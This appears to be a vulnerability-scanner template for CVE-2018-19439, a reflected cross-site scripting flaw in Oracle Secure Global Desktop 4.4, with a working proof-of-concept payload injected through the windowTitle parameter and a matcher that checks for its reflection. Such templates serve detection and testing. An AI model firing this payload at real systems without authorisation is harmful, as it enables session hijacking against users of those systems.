39 lines
1.9 KiB
YAML
39 lines
1.9 KiB
YAML
id: CVE-2018-19439
|
|
|
|
info:
|
|
name: Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting
|
|
author: madrobot,dwisiswant0
|
|
severity: medium
|
|
description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking or unauthorized actions.
|
|
remediation: Fixed in later versions including 5.4.
|
|
reference:
|
|
- http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-19439
|
|
- http://seclists.org/fulldisclosure/2018/Nov/58
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2018-19439
|
|
cwe-id: CWE-79
|
|
epss-score: 0.01097
|
|
epss-percentile: 0.82731
|
|
cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: oracle
|
|
product: secure_global_desktop
|
|
tags: oracle,xss,seclists,packetstorm,cve,cve2018
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<script>alert(1337)</script><!--</TITLE>"
|
|
# digest: 4a0a00473045022100de57ebb345cebf2fcbd5997146867b8e395c9b9b27783ed9f2ee22edfedb78460220059b544baaecbb65bd6a56e105122a6c35e1f254c43c85ad9619dec9f6cbd799:922c64590222798bb761d5b6d8e72950 |